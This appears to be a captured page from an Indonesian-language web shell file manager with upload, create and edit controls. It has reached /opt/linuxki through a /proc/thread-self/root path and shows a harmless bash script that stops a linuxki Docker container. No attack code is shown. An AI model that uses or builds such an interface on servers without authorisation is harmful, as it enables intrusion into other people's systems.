CURRENT PATH:
/
proc
/
thread-self
/
root
/
proc
/
thread-self
/
root
/
opt
/
linuxki
/
[ ⬅ KEMBALI ]
|
[ HOME ]
Upload File:
Upload Ke Sini
Dir Baru
File Baru
Editing:
kivis-stop
#!/bin/bash # # Stops the user's linuxki Docker container, if it is running. container="$USER-linuxki" if docker ps -f name=$container 2>/dev/null | grep -q $container; then docker stop $container fi
SIMPAN
[ BATAL ]